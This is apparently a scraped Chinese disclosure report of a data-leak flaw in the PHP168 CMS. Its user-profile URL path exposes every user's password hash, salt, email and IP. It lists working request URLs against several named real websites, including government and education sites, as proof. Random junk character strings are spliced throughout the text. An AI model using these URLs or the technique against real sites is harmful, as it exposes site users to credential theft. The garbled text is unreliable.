简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile& ^* d# d+ f/ }3 k" |
( {# r- u% V( @$ s9 F' C' C
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:" L4 c3 ?: |; a# w2 L& u; F5 U
9 l* f1 r/ G% z1 W v) O: `, chttp://php168.cn/com/homepage.php/admin/member-profile3 p5 x7 ]- |: v5 r& t9 {
/ o! Z6 X* [7 A5 C
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
2 m/ @4 s A: lhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
# G- A* d: j' U A8 \" M
8 l e% m$ B8 G) s 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:4 X. o1 s, y4 |9 g1 X
% d3 f- z9 k1 ^4 e" C C% yhttp://www.zjfzol.com.cn/homepage.php/admin/member-profile
0 L1 M' o% c7 U6 Q! \/ y9 M( x
( H/ v/ W9 j+ R) o* e4 y; T, Ahttp://www.scswl.cn/homepage.php/admin/member-profile
# y6 F5 D' P! d
1 V( x$ r3 o* e. H+ {$ V( Shttp://www.tunet.edu.cn/homepage.php/admin/member-profile( v6 k N+ c4 h2 y! p3 O6 C
- Y6 x) C* n; F
http://www.itlead.com.cn/homepage.php/admin/member-profile8 y* m) t7 v- U& F0 w8 n
/ L. p" U5 n" O& W' u1 mhttp://www.aedp.cn/homepage.php/admin/member-profile
" ]( Z6 a) z; R! F% ^- n8 @& Z W- a: I) C9 f5 h [
http://www.qianlongnews.com/homepage.php/test/member-profile8 k4 h8 u, `1 R$ C m' v# F
# E% y s S# n
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]: ?5 V8 i; B( {
[/table] |